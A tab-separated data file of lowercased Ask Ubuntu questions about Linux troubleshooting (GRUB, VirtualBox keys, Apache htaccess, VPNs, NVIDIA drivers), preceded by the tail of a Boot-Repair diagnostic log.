msdos sda1 : sda , not-sepboot , no-grub-install , grub , no-update-grub , no-apt-nor-yum , 32 , no boot , /mnt/boot-sav/sda1 , with-os , no-gpt , notefitable , no-fstab . sda2 : sda , is-maybe-sepboot , no-grub-install , grub , no-update-grub , no-apt-nor-yum , 32 , no boot , /mnt/boot-sav/sda2 , no-os , no-gpt , notefitable , no-fstab . sdc1 : sdc , not-sepboot , grub-install , grub2 , update-grub , apt-get , 64 , with boot , /mnt/boot-sav/sdc1 , with-os , gpt , notbisefi , fstab-without-efi . sdb1 : sdb , is-maybe-sepboot , no-grub-install , grub , no-update-grub , no-apt-nor-yum , 32 , with boot , /media/mylinuxlive , no-os , no-gpt , notefitable , no-fstab . parted : model : ata samsung ssd 840 ( scsi ) disk /dev/sda : 250gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 368mb 367mb primary ntfs boot 2 368mb 250gb 250gb primary ntfs model : sandisk extreme ( scsi ) disk /dev/sdb : 32.0gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 16.4kb 32.0gb 32.0gb primary fat32 boot , lba model : ata sandisk sdssdxp1 ( scsi ) disk /dev/sdc : 120gb sector size ( logical/physical ) : 512b/512b partition table : gpt number start end size file system name flags 1 1049kb 120gb 120gb ext4 warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : /dev/sr0 : unrecognised disk label mount : aufs on / type aufs ( rw ) tmpfs on /lib/init/rw type tmpfs ( rw , nosuid , mode=0755 ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) udev on /dev type tmpfs ( rw , mode=0755 ) tmpfs on /dev/shm type tmpfs ( rw , nosuid , nodev ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=620 ) /dev/sr0 on /live/image type iso9660 ( ro , noatime ) tmpfs on /live/cow type tmpfs ( rw , noatime , mode=755 ) tmpfs on /live type tmpfs ( rw , relatime ) tmpfs on /tmp type tmpfs ( rw , nosuid , nodev ) fusectl on /sys/fs/fuse/connections type fusectl ( rw ) /dev/sdb1 on /media/mylinuxlive type vfat ( rw , nosuid , nodev , uhelper=udisks , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush ) /dev/sda1 on /mnt/boot-sav/sda1 type fuseblk ( rw , allow_other , blksize=4096 ) /dev/sda2 on /mnt/boot-sav/sda2 type fuseblk ( rw , allow_other , blksize=4096 ) /dev/sdc1 on /mnt/boot-sav/sdc1 type ext4 ( rw ) /sys/block/sda : alignment_offset bdi capability dev device ext_range holders inflight power queue range removable ro sda1 sda2 size slaves stat subsystem trace uevent /sys/block/sdb : alignment_offset bdi capability dev device ext_range holders inflight power queue range removable ro sdb1 size slaves stat subsystem trace uevent /sys/block/sdc : alignment_offset bdi capability dev device ext_range holders inflight power queue range removable ro sdc1 size slaves stat subsystem trace uevent /sys/block/sr0 : alignment_offset bdi capability dev device ext_range holders inflight power queue range removable ro size slaves stat subsystem trace uevent /dev : block bsg btrfs-control bus cdrom cdrw char console core cpu_dma_latency disk dvd dvdrw fd full fuse hidraw0 hidraw1 hidraw2 hidraw3 hidraw4 hpet initctl input kmsg log makedev mcelog md mem net network_latency network_throughput null port ppp psaux ptmx pts random rtc rtc0 scd0 sda sda1 sda2 sdb sdb1 sdc sdc1 sg0 sg1 sg2 sg3 shm snapshot snd sndstat sr0 stderr stdin stdout urandom usb v4l vga_arbiter video0 xconsole zero warning : gpt ( guid partition table ) detected on '/dev/sdc ' ! the util fdisk does n't support gpt . use gnu parted . df : filesystem type size used avail use % mounted on aufs aufs 3.8g 9.3m 3.8g 1 % / tmpfs tmpfs 3.8g 0 3.8g 0 % /lib/init/rw udev tmpfs 3.8g 184k 3.8g 1 % /dev tmpfs tmpfs 3.8g 0 3.8g 0 % /dev/shm /dev/sr0 iso9660 339m 339m 0 100 % /live/image tmpfs tmpfs 3.8g 9.3m 3.8g 1 % /live/cow tmpfs tmpfs 3.8g 0 3.8g 0 % /live tmpfs tmpfs 3.8g 8.0k 3.8g 1 % /tmp /dev/sdb1 vfat 30g 888m 29g 3 % /media/mylinuxlive /dev/sda1 fuseblk 350m 259m 92m 74 % /mnt/boot-sav/sda1 /dev/sda2 fuseblk 233g 104g 129g 45 % /mnt/boot-sav/sda2 /dev/sdc1 ext4 111g 3.8g 101g 4 % /mnt/boot-sav/sdc1 fdisk : disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00007c51 device boot start end blocks id system /dev/sda1 * 2048 718847 358400 7 hpfs/ntfs partition 1 does not end on cylinder boundary . /dev/sda2 718848 488394751 243837952 7 hpfs/ntfs disk /dev/sdc : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders , total 234441648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 1 234441647 117220823+ ee gpt disk /dev/sdb : 32.0 gb , 32017047552 bytes 255 heads , 63 sectors/track , 3892 cylinders , total 62533296 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000c1e14 device boot start end blocks id system /dev/sdb1 * 32 62530623 31265296 c w95 fat32 ( lba ) ************************before mainwindow fsck_action no pastebin_action yes recommendedrepair , reinstall , reinstall_possible yes purge_possible yes unhideboot_action yes ( 10s ) , noflag ( sda1 ) part_to_reinstall_grub sdc1 , part_to_reinstall_grub_purge sdc1 , force_grub all ( sdc ) removabledisk no use_separatebootpart no ( sda2 ) grub2 ( sda1 ) uncomment_gfxmode no ata add_kernel_option no ( acpi=off ) mbr_to_restore sda ( mbr ) ( ) warning : unknown mime-type for `` /mnt/boot-sav/sdc1/etc/default/grub '' -- using `` application/octet-stream '' error : no `` view '' mailcap rules found for type `` application/octet-stream '' adding : log/ ( stored 0 % ) adding : log/log/ ( stored 0 % ) adding : log/log/2014-01-28__21h42boot-repair33/ ( stored 0 % ) adding : log/log/2014-01-28__21h42boot-repair33/sdc1/ ( stored 0 % ) adding : log/log/2014-01-28__21h42boot-repair33/sdc/ ( stored 0 % ) adding : log/log/2014-01-28__21h42boot-repair33/sdc/current_mbr.img ( deflated 100 % ) adding : log/log/2014-01-28__21h42boot-repair33/sdb1/ ( stored 0 % ) adding : log/log/2014-01-28__21h42boot-repair33/sdb/ ( stored 0 % ) adding : log/log/2014-01-28__21h42boot-repair33/sdb/current_mbr.img ( deflated 97 % ) adding : log/log/2014-01-28__21h42boot-repair33/sda2/ ( stored 0 % ) adding : log/log/2014-01-28__21h42boot-repair33/sda1/ ( stored 0 % ) adding : log/log/2014-01-28__21h42boot-repair33/sda/ ( stored 0 % ) adding : log/log/2014-01-28__21h42boot-repair33/sda/current_mbr.img ( deflated 95 % ) adding : log/log/2014-01-28__21h42boot-repair33/2014-01-28__21h42.boot-repair.log.tee ( deflated 75 % ) adding : log/2014-01-28__21h42boot-repair33/ ( stored 0 % ) adding : log/2014-01-28__21h42boot-repair33/sdb1/ ( stored 0 % ) adding : log/2014-01-28__21h42boot-repair33/sdb/ ( stored 0 % ) adding : log/2014-01-28__21h42boot-repair33/sdb/current_mbr.img ( deflated 97 % ) adding : log/2014-01-28__21h42boot-repair33/sdc1/ ( stored 0 % ) adding : log/2014-01-28__21h42boot-repair33/sdc/ ( stored 0 % ) adding : log/2014-01-28__21h42boot-repair33/sdc/current_mbr.img ( deflated 100 % ) adding : log/2014-01-28__21h42boot-repair33/sda2/ ( stored 0 % ) adding : log/2014-01-28__21h42boot-repair33/sda1/ ( stored 0 % ) adding : log/2014-01-28__21h42boot-repair33/sda/ ( stored 0 % ) adding : log/2014-01-28__21h42boot-repair33/sda/current_mbr.img ( deflated 95 % ) adding : log/2014-01-28__21h42boot-repair33/2014-01-28__21h42.boot-repair.log.tee zip warning : file size changed while zipping log/2014-01-28__21h42boot-repair33/2014-01-28__21h42.boot-repair.log.tee ( deflated 82 % ) internet : no-internet ************************actions fsck_action no pastebin_action yes recommendedrepair , reinstall , reinstall_possible yes purge_possible yes unhideboot_action yes ( 10s ) , noflag ( sda1 ) part_to_reinstall_grub sdc1 , part_to_reinstall_grub_purge sdc1 , force_grub all ( sdc ) removabledisk no use_separatebootpart no ( sda2 ) grub2 ( sda1 ) uncomment_gfxmode no ata add_kernel_option no ( acpi=off ) mbr_to_restore sda ( mbr ) ( sda 1 ) unhide grub boot menu in sdc1/etc/default/grub reinstall the grub of sdc1 into all mbrs of disks with os or not-usb reinstall the grub of sdc1 into the mbr of sda dpkg -- configure -a sdc1 grub-install ( grub ) 2.00-19ubuntu2.1 chroot : failed to run command `type ' : no such file or directory installoutput : source_dir does n't exist . please specify -- target or -- directory installexit:1 generating grub.cfg ... found linux image : /boot/vmlinuz-3.11.0-15-generic found initrd image : /boot/initrd.img-3.11.0-15-generic found linux image : /boot/vmlinuz-3.11.0-12-generic found initrd image : /boot/initrd.img-3.11.0-12-generic found memtest86+ image : /boot/memtest86+.bin found windows 8 ( loader ) on /dev/sda1 reinstall the grub of sdc1 into the mbr of sdc dpkg -- configure -a sdc1 grub-install ( grub ) 2.00-19ubuntu2.1 chroot : failed to run command `type ' : no such file or directory installoutput : source_dir does n't exist . please specify -- target or -- directory installexit:1 generating grub.cfg ... found linux image : /boot/vmlinuz-3.11.0-15-generic found initrd image : /boot/initrd.img-3.11.0-15-generic found linux image : /boot/vmlinuz-3.11.0-12-generic found initrd image : /boot/initrd.img-3.11.0-12-generic found memtest86+ image : /boot/memtest86+.bin found windows 8 ( loader ) on /dev/sda1 unhide grub boot menu in sdc1/boot/grub/grub.cfg internet : no-internet internet : no-internet
412509	ubuntu sdk x86 tablets access sensors	it seeems to be possible to install ubuntu on x86 tablets . but how about the ubuntu sdk ? is it possible to create x86 apps that work with all tablet sensors ?
412510	virtualbox release key after a few seconds	i am using ubuntu in virtualbox and it works pretty fine , but there is a problem that i am having since i started using it . i use emacs and therefore , i use a lot of combinations/shortcuts/bindings all the time . the problem is that when i press and hold a key , for instance , ctrl for searching ( ctrl+s ) , if i want to keep looking i just hold it , but in this virtualmachine after a few seconds the ctrl key is released ( without me releasing it ) and i finish writing a bunch of 's ' , in this case . another simpler example would be , changing windows with alt+tab , after a while alt is released and i end up pressing just tab in the last window changed . i guess this has something to do with some kind of refreshing of the peripherals or something , but it is really annoying . any ideas on how to solve it ? thanks a lot ! update murphy 's law working here . i have been having this issue for the last 3 months ( since i started working with this virtual machine ) , but suddenly when i asked this question i works just fine . i guess i 'll have to ask more often : ) anyway , i do n't think this will last forever , so if anyone has any idea about why this is happening and how to avoid it , it would be great ! update 2 i knew i should n't have said anything . it is back ! haha
412513	removing windows 8 and keeping ubuntu	i now dual boot with windows8 and ubuntu . i 've decided to junk windows forever . is it better to format my entire drive before i reinstall ubuntu ?
412514	how to configure specify ip address on network connection sharing ?	is possible to configure specify ip address for internet connection sharing ? i have configure before for internet connection sharing using network manager on ubuntu 12.04 . all of pc which i connected to server working well with internet connection . the clients get ip 10.42.0.x then server have ip 10.42.0.1 . is possible to change it ? for example i want to configure my server as 192.168.0.1 and client 192.168.0.2 - 255
412515	chrome wo n't resize , sits over unity menu , can not move	suddenly today when i open chrome in ubuntu 12.04 i get chrome sitting over the top of the classic menu ( using gnome ) . nothing happens if i press maximise , nor when i drag to resize ( the cursor changes to the resize symbol but nothing moves ) . i 've tries selecting and deselecting 'use system titles and borders ' but that just does what you 'd expect and makes the browser completely full screen . always on top is not selected . i 've purged the install and downloaded the latest version . i ca n't move it anywhere on my screen , it just wont give me that option . any help please ? this has been working fine for months and there 's been no update as far as i know .
412518	samba mounted filesystems with gvfs over vpn hang	i use nautilus to mount some remote windows shares over a vpn . if for any reason whilst these shares are mounted the vpn is interrupted , e.g . if i put the computer to suspend/sleep mode or if the vpn times out due to inactivity , i find that any program that was using or tries to use this share just hangs . i often have a terminal open pointing to a path under /run/user/1000/gvfs/ , and when this happens that terminal or any application open in it becomes completely unresponsive . even if i reconnect to the vpn , it still takes quite a while before those applications/terminals become usable again . so my questions are : is there a way to prevent this from happening , asides from the obvious which is to unmount before disconnecting the vpn . i 'm sure windows does n't have the suspend/resume problem . if not , is there a way to make the consequences of this the timeout shorter without affective connectivity ? once this has already happened , is there a way to recover without waiting for the timeout , e.g . lazy unmounting or killing processes ? please give details e.g . how to do the lazy unmount , which processes to kill , etc ?
412521	why the need for a reboot with new hdd dock ?	why is it necessary to reboot the computer for the os to see a new hdd dock with a new hdd attached ? background for the question : i recently purchased a new 3tb hdd . when docking it in my old hdd dock , i ran into the problem that gparted reported the drive as being only 746gb or so . after some searching on the internet , i figured out that my old hdd docking stations only support drives up to 2tb . so i ran to the shop and bought a new dock which explicitly support drives up to 4tb . i plugged the power , plugged the usb , and inserted my 3tb drive into the dock . i fired gparted , but , horror ! , gparted did n't see the drive at all . i looked at the box of the dock and saw that it supported usb 3.0 while my mainboard only supports usb 2.0 . i was confused because i thought the newest usb version was backward compatible . i ran back to the shop and explained my problem . they assured that , as i thought , usb 3.0 is backward compatible with 2.0 and regardless of what my mainboard supports , it should be able to read it ( albeit at usb 2.0 speed , obviously ) . they asked me whether i used windows xp , vista or windows 7 . i said i use linux . they said : `` haha ! , there 's the problem : on the box of the docking station , it does n't say it supports linux ! '' . i thought : `` f*** you ! '' and said : `` the problem is not the linux os , as i am certain that it supports 4tb drives , usb 3.0 and this since much longer than windows has , and if i were to limit my hardware purchases to items which officially support linux ( as printed on the box ) , i would n't be able to purchase any hardware at all ! '' . so , they advised me to reboot my computer to see if my os would see the new docking station and the hdd within it . i thanked them , went home , and tried to reboot the computer , and , indeed , gparted now saw the full 3tb of the new hdd ! : ) now , i have been using linux for 13 years , and i have long lost the habit of rebooting the computer after installing new software and new usb hardware . i was sceptical that simply rebooting the os would fix my problem , but it did . the question now is : why ?
412525	vagrant up and annoying nfs password asking	sorry for the language mistakes i 've made . i 'm trying to prevent vagrant asking the password when it mounts shared folders by nfs : [ server ] exporting nfs shared folders ... preparing to edit /etc/exports . administrator privileges will be required ... [ sudo ] password for timur : # ! ! ! i 've red many online resources like github and other author 's posts , but nothing work for me ... i tried the instructions was found here . i do n't have deep cli working knowledge . so could anybody give correct solution for my problem ?
412526	best software for android device on ubuntu ?	i have htc android device and i am using ubuntu 13.10 , i need a no the best but if it 's best that ok a software for sync and update device . urgent suggest need here >
412532	setup vpn in complex setup	let me describe you my situation . i have an old laptop , which has ubuntu 12.04 installed positioned central in my house . this laptop is connected to my airport extreme . the latter is ( by wire ) connected to my providers router ( it 's called bbox and this box has the incoming landline ) . i 've connected my nas to the ubuntu laptop by so it serves as file server within my local network . by so , i can connect to my ubuntu laptop from my iphone and my macbook pro . the airport extreme gives static ip 's to my ubuntu laptop ( 10.0.1.99 ) , my iphone ( 10.0.1.88 ) and my mac ( 10.0.1.77 ) . with this setup , i can connect and browse to my ubuntu files ( mostly movies and tv-shows ) . but i would like to browse through my files from outside my network as well ( in my car , in my office , ... ) . so i thought a vpn would bring the solution . i 've followed many guides and tutorials ( mostly about openvpn2 ) , but i can not make this setup work . are there any practical how-to guides in my situation ? or anyone who can tell me what to install on what device ? any help would be most welcome .
412533	is there any software that allows live multiple webcam picture-in-picture via skype or google hangout ?	i 've looked in all the askubuntu forums , stack exchange forums , generic google searches worded 23 different ways , youtube searches worded 13 different ways , and still can not find any answer to my problem ; just know that i 'm not coming here to ask this question cold and without prior research . while i know that there are software packages suitable for multiple-webcam , picture-in-picture video recording and uploading to youtube , what i 'm wondering is this : has anyone ever heard of a software package that allows one to make real-time , live , picture-in-picture video calls using either google hangout or skype ( or similar webcam communication package ) ? i teach music lessons using google hangout or skype , depending upon my student 's software and capabilities . i need to have one camera videoing my head and upper torso , and , at the same time , have a second camera videoing my hands up close as i video-chat in real time . is there such a software package out there that would allow this ? i 'm running ubuntu 12.04 ; i 'm happy to give you all of my hardware specs if it turns out that there exists such a program and you need that info . ( i may as well mention here that i 'm a linux n00b ; copy-and-paste-able terminal commands would be sooo very much appreciated . ) thanks in advance for your time ; out of all the things you could have done , you looked at my little fussiness , so i thank you . -cheers !
412534	confusing input error	during general use my laptop ( lenovo thinkpad edge 15 running ubuntu 12.10 ) will suddenly mute its volume and stall for a few seconds , seemingly for no reason . at the same time if i 'm in a terminal the previous command is selected . i have observed that the problem seems to occur if my wrists are resting on the laptop below the keyboard , to either side of the touchpad , but not if they 're held above it . it has also seemed linked to using the nub mouse or the nub mouse scroll button ( located between the left and right clickers directly below the space bar ) . disabling the track pad has not helped the issue , though i have not tested disabling the nub mouse or associated buttons . i installed a keylogger to help monitor and then used the system for a while , sure enough it happened a few times and i isolated the following series of keypresses that occur of their own accord : < up > < e-71 > < lalt > < # +1 > j < # +61 > the < # items seem to be a count , which is strange as the lalt key would not normally record a count and i 've not been able to press any combination which causes this in normal use . the number after the j seems arbitrary , from 1 up to hundreds . the e-71 key is the laptop 's volume mute , on the f1 key ( the f keys have a separate fn trigger button ) . at times the volume has switched on and off , i suspect with this process happening multiple times . i recreated it a single time by pressing hard on the laptop case to the left of the trackpad , but have not been able to do this again . so there may be a hardware element , though the laptop is otherwise in good working order and physical condition - it has never been dropped or suffered an impact , and this problem has only been occurring for a few weeks , without anything that comes to mind as a trigger for when it started . it may be just a hardware problem , but if there are ways of working round it ( the small stall is likely due to the weird key combination confusing the os ) i 'd be interested , and more so if anyone else has experienced similar .
412535	what does it mean to run gedit in standalone mode ?	i was reading man gedit , when i stumbled upon this : -s , -- standalone run gedit in standalone mode . the official gedit documentation on this subject did not make me much wiser . so ... what does standalone mode really mean ? when would i need this ?
412536	acer aspire v5-571 not shutting down but restarting after 9 seconds	my aspire 571g is dual booted with windows7 and ubuntu 12.4 . everything is fine but when i off the power from ubuntu , the system is halting and within 9 seconds , the system is starting again . the same thing is happening when any of the linux distributions is installed . pls suggest some solutions..
412541	black screen/blinking cursor nvidia	ive been on this all week and seriously want ubuntu . i am trying to install ubuntu ( tried both 12.04 and 13.10 ) on my samsung q430 with an nvidia geforce 310m . i have tried all the methods ive found around including blacklisting nouveau and completely purging it . ive also tried to install the nvidia drivers but it says nouveau is still running . after i installed ubuntu i rebooted . when the notebook boots up it passes bios screen , then hits a black screen with a purple cursor , then a black screen with a white cursor on the top left.there is no response to ctrl+alt+f1-6 or shift or shift esc . i am able to get in via live usb . i then mounted my ubuntu and tried the several methods here : https : //help.ubuntu.com/community/binarydriverhowto/nvidia i am unable to install nvidia drivers through its installer . it says nouveau is still running . i went to virtual terminal and stopped lightdm . still unable to run driver installer . please help .
412542	how do i run a gui app from the command line ?	i need to launch a gui program from the command line on a machine i have ssh 'd into . i do n't need to interact with it or see the window , just have it running . when i try and launch it i get : ubuntu @ ip-35-163-23223429-46 : ~/photoscan-pro $ ./photoscan.sh photoscan : can not connect to x server is there anything i do ? i 'm on ubuntu 12.04 . thanks !
412544	how to list active displays ( on command line ) ?	xrandr -q gives me a list of connected displays , but how can i find out ( script friendly ) if a display is currently active ? context : i would like to write a script to toggle a display . if it 's active it should be turned off , if it is n't it should be turned on . note : xrandr -q basically provides this information since active modes are marked with a * , but this information is hard to extract within a bash script .
412546	how to setup my machine to run as a web proxy ?	i am running ubuntu 13.04 and i want to set it up so that all the web traffic in the lan must go through my machine .
412547	gave up waiting for root device error	i used my computer normally . but recently i opened disks and deleted a partition ( it said that unknown file type so i think that the partition is just some drive i forgot to format so i deleted it ) . it remains 360 gb , my hdd drive so i start to think i messed up with something . after rebooting i met this error : gave up waiting for root device . common problems : - boot args ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enough ? ) - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; ls /dev ) . alert ! /dev/mapper/ubuntu -- gnome -- -vg-root does not exist . dropping to a shell ! busybox v1.20.2 ( ubuntu 1:1.20.0-8ubuntu ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) and i saw the partition ( i deleted ) is not mounted with /boot and the ubuntu -- gnome -- vg-root is not the drive i deleted but that drive ( mounted with /boot ) is not in the disk drives in gnome-disks . p/s : what i see when i do blkid : ( initramfs ) blkid /dev/sda1 : uuid= '' 77126537-2a04-41c5-a8e5-g66162a7c87a '' type= '' ext2 '' btw thanks to rescatux i finally can see my drive . gparted shown this info : partition : /dev/sda1 file system : ext2 size : 243.000 mib partition : unallocated file system : unallocated size : 297.85 gib and planning to add : partition : /dev/sda1 file system : ext2 size : 243.000 mib partition : new partition # 1 file system : linux-swap size : 2.00 gib partition : new partition # 2 file system : ext2 size : 260.00 gib partition : unallocated file system : unallocated size : 297.85 gib but i hope you guys fond a solution because i relised only 2 drives are in the disk ( one is hdd and one is my usb rascatux ) so that maybe my data has been lost . i hope not because i might apply my choice and create a new partition and then reinstall ubuntu-gnome . i , maybe , will found back my data after i reinstall ubuntu !
412558	ffmpeg-video trim from the end of the video	i have some videos of different duration.i want to cut ( remove ) the last 5 seconds of all videos.can i use 'ffmpeg ' in a loop to trim the videos ? please help me .
412560	difference between openvz and parallels virtuozzo containers os templates and the way how centos and ubuntu starts inside the container	i have an parallels virtuozzo containers vps with centos 5 os template . i ca n't change the template trough the pvc power panel nor by asking my provider to do that . he told me that the image is the container and it 's impossible to change it . i 've tried unpacking the openvz ( not pvc ) centos 6 image directly into my container 's virtual disk and ... it worked ! there was some errors during the boot and there was many unnecessary files ( that i did n't removed ) but it booted and even the hypervisor was able to add an ip address to the container and i could manage files in there trough the pvc power panel . i wanted ( and i still do ) ubuntu in there so i 've tried the same way and it even started and the ssh service ( along with the others ) was up ( i could see that in pvc power panel ) but i could n't access the container directly via ssh nor http . yesterday my provider finally repaired some problem with the `` repair mode '' ( in which another container is created with the clean os image , my ip address is attached there and my container vhd is mounted under /repair directory so i can repair it when it crashes ) . then i 've tried to unpack the ubuntu image ( for openvz not pvc ) into /repair directory after removing every file from there and boot it . unfortunately it wo n't started again . even worst , i could n't access the power panel - there was nothing responding on my ip address:4643 . i had to write to my provider to restore a clean image for me . right now it works , but i do n't understand how this could happen . is that normal that after removing some files the access to the pvc pp is impossible ? why ? what files are important ? how does the ubuntu and centos starts under opvenvz/virtuozzo ? what is the difference ? where can i get the os templates for pvc ? and finally , how can i install the image myself without crushing the pvc power panel ?
412561	running bash loop	i 've created a while loop in a bash script to run a couple of php commands . the reason why i 've created the while loop is because i ca n't use cronjobs ( i do n't want to create a new instance of the bash script while the other one is still running ) . previously i ran the command using screen but it seems eventually my resources were all eating up by this process . so my question is ; what is a good alternative to run the bash script ? script is similar to : # ! /bin/bash echo `` starting daemon.. '' while true ; do echo `` running runjobs.. '' cd /var/www/wiki & & nice -n 10 /usr/bin/php maintainall.php maintainwiki runjobs > > /var/log/runjobs.log echo `` sleeping 60 seconds.. '' sleep 60 done
412567	`` ns= : `` in terminal profile when source .bashrc	i do n't know what have i done in my ubuntu 12.04 . but whenever i igarcia @ dulx0004 : ~ $ source .bashrc i get the following [ ns= : ] igarcia @ dulx0004 : ~ $ what is going on ?
412573	prevent listing hosted domain under ip	when i enter my public ip with one of my hosted domains , folders appear , such as public_html etc . it is ok , when i enter just www.domain.com , since i configured documentroot directly to public_html . but the case is when external ip is entered , such as 66.77.88.99/domain.com i tried to place .htaccess to the same directory where public_html to prevent indexing , but no result .
412574	pxe boot server installation steps in ubuntu server vm	how can i install ubuntu virtual machine using pxe boot server ? i need the all the configurations details and what to change in the configurations files .
412575	htaccess not working on ubuntu 12.04 tried everything	i have frusted doing all things given on web for htaccess get working on ubuntu . but i could not do it . actually i want to run my codeigniter app on lamp , its not production server . so in www directory , there could be multiple folders e.g . www/punepchub i access url localhost/punepchub/support/ , it gives 404 error i want to redirect above link to localhost/punepchub/index.php/support/ using htaccess , following are the contents of htaccess file : rewriteengine on rewritecond % { request_filename } ! -f rewritecond % { request_filename } ! -d rewriterule ^ ( . * ) $ index.php/ $ 1 [ l ] where as above mentioned htaccess works perfect on wamp as well as lamp given by godaddy hosting , but it is not working on lamp server setup on my local ubuntu 12.04 desktop machine i think apache is not accessing the htaccess file . i tried following but it did n't worked i have installed lamp using tasksel enabled rewrite module using command : sudo a2enmod rewrite it displays the module in the list given by command : sudo apache2ctl -m changed etc/apache2/sites-available/default file with allowoverride all , also i did same in etc/apache2/sites-enabled/000-default i have 777 permissions for project folder and files also i am confused about is there any need to create virtual hosts , as this is not production server . please help me i really do n't know how resolve this issue now . in advance many thanks
412576	swap caps lock and ctrl in ubuntu 13.10	can anyone explain how to swap caps lock and ctrl keys on ubuntu desktop under unity . i use it to avoid emacs pinky .
412577	apache2 configuration and security	i have installed apache2 under ubuntu 12.04 . first i read the differences about mpm worker and prefork . in my case it is in worker . in my apache2.conf i have : < ifmodule mpm_worker_module > startservers 2 minsparethreads 25 maxsparethreads 75 threadlimit 64 threadsperchild 25 maxclients 150 maxrequestsperchild 0 < /ifmodule > and a grep -ef | grep apache2 gives : root 1189 1 0 13:14 ? 00:00:00 /usr/sbin/apache2 -k start www-data 1192 1189 0 13:14 ? 00:00:00 /usr/sbin/apache2 -k start www-data 1194 1189 0 13:14 ? 00:00:00 /usr/sbin/apache2 -k start www-data 1195 1189 0 13:14 ? 00:00:00 /usr/sbin/apache2 -k start and i do n't understand why there are 4 processes and why 1 is owned by root and the others by www-data . second i also read it was not a good idea to set the /var/www with www-data as owner and group . but i do n't understand why ? the good way would be to leave root as owner with full rights and the group to www-data with rx rights . it 's right ?
412580	how can i find the ip of a nas connected via smb ?	the question says it all . i have a nas which was working quite well for quite some time . for some or other reason i started using smb instead of ftp . now i can no longer access the configuration dashboard of the nas . i am not sure what i messed up , but i do not know the ip address of the nas anymore . how can i find the ip address of the nas ?
412581	add existing user to unity	short story how can set unity as desktop environment for an user created with shell ? long story on a vm running ubuntu 12.04 configured as lamp , i need to use the desktop environment unity for the user www-data . i need this to simplify files permission management while developing with phpstorm , so when i save a file it already has www-data : www-data as group : owner . ( maybe there 's a better solution than work as www-data in unity , if yes please tell me ) i could n't find any automatic way to add an existing user to unity , maybe i searched with the wrong terms , so i tried a dirty manual way and these are the steps i did , some are optional but useful in my case : 1 ) changed home directory of www-data from '/var/www ' to '/home/www-data ' : sudo usermod -d /home/www-data www-data 2 ) changed shell of www-data from sh to bash : sudo chsh -s /bin/bash www-data 3 ) set a password for www-data sudo passwd www-data 4 ) since i already had a well configured desktop environment for another user 'ian ' , i copied existing user 'ian ' home dir to www-data home dir , preserving permissions and than changing group and owner : sudo cp -a /home/ian/ . /home/www-data/ sudo chown -r www-data : www-data /home/www-data 5 ) added www-data to sudoers : sudo usermod -ag sudo www-data 6 ) added www-data to the same groups of ian sudo usermod -a -g cdrom , dip , plugdev , sambashare , lpadmin www-data 7 ) configured the greeter to show manual login : sudo echo 'greeter-show-manual-login=true ' > > /etc/lightdm/lightdm.conf 8 ) rebooted the vm sudo reboot actually i can login with www-data and i have the same desktop environment as user ian but i ca n't see www-data in the list of available users of the greeter and also in the list of 'user accounts ' . only ian is displayed . i also tried to set minimum-uid=0 in /etc/lightdm/users.conf with no luck . i am missing something , any idea ? thanks !
412582	moving /root to lv on sdb	i 'm new to ubuntu . i want to install ubuntu server 12.04 and run on it redmine . i think to use two hdd - sda and sdb . i 'll install ubuntu on sda and make lv on sdb , and i want to move /root from sda on lv on sdb , because i expect a big amount of data ( mysql db and files ) . i want to be able to extend my lv according to the data growth . and my question is , is this possible ( if yes how ) and is reasonable ? i am stuck on editing /etc/fstab file .
412585	i have a brother dcp-j315 printer which ubuntu sees but will not print from wirelessly	i have tried to set it up but am new to ubuntu os
412586	running both sendmail and postfix on ubuntu	i have a requirement to use both sendmail ( mta ) and postfix on a mailserver . this is because many of the legacy sendmail.mc rules can not be migrated to postfix and provide high performance . so i need to run sendmail for incoming mail and postfix for outgoing on the same server . however on ubuntu distros , as soon as i install sendmail - > postfix is removed and vice versa . do you have recommendation on overriding this ? thanks vijay
412587	mdadm : ssd+hdd raid 1	how do i setup a raid 1 on mdadm between a ssd and a hdd , without loosing ssd reading speed and with boosting write-speeds of the hdd .
412588	make a bootable image of installed linux	is there a way to create a bootable disk of the installed linux os retaining all the settings and programs . i.e i 'd wanted to restore all the settings and installed programs of my os when i install it on pc without having to go through the process of re-installing every thing .
412589	nvidia-settings error/bug in terminal ( fixed ! )	when i start nvidia-settings in terminal i get this , what can be the cause of this : error : error querying target relations the program 'nvidia-settings ' received an x window system error . this probably reflects a bug in the program . the error was 'badrequest ( invalid request code or no such operation ) ' . ( details : serial 214 error_code 1 request_code 156 minor_code 29 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) i checked in synaptic the version of nvidia-settings installed is 331.20 nvidia-304-updates and recommended driver for my hardware is 304 could be because of this that i 'm using newer nvidia-settings with an older driver installed ? should i install nvidia-settings 304 ? i ran -- sync option provided in description but the error persists to appear . tried to completely re-installed nvidia-settings and still the same , maybe it be developer 's bug .
412591	hide launcher bar for all users	i tried hiding my launcher bar on my local account , but when i go to other users on the active directory , it is still there .
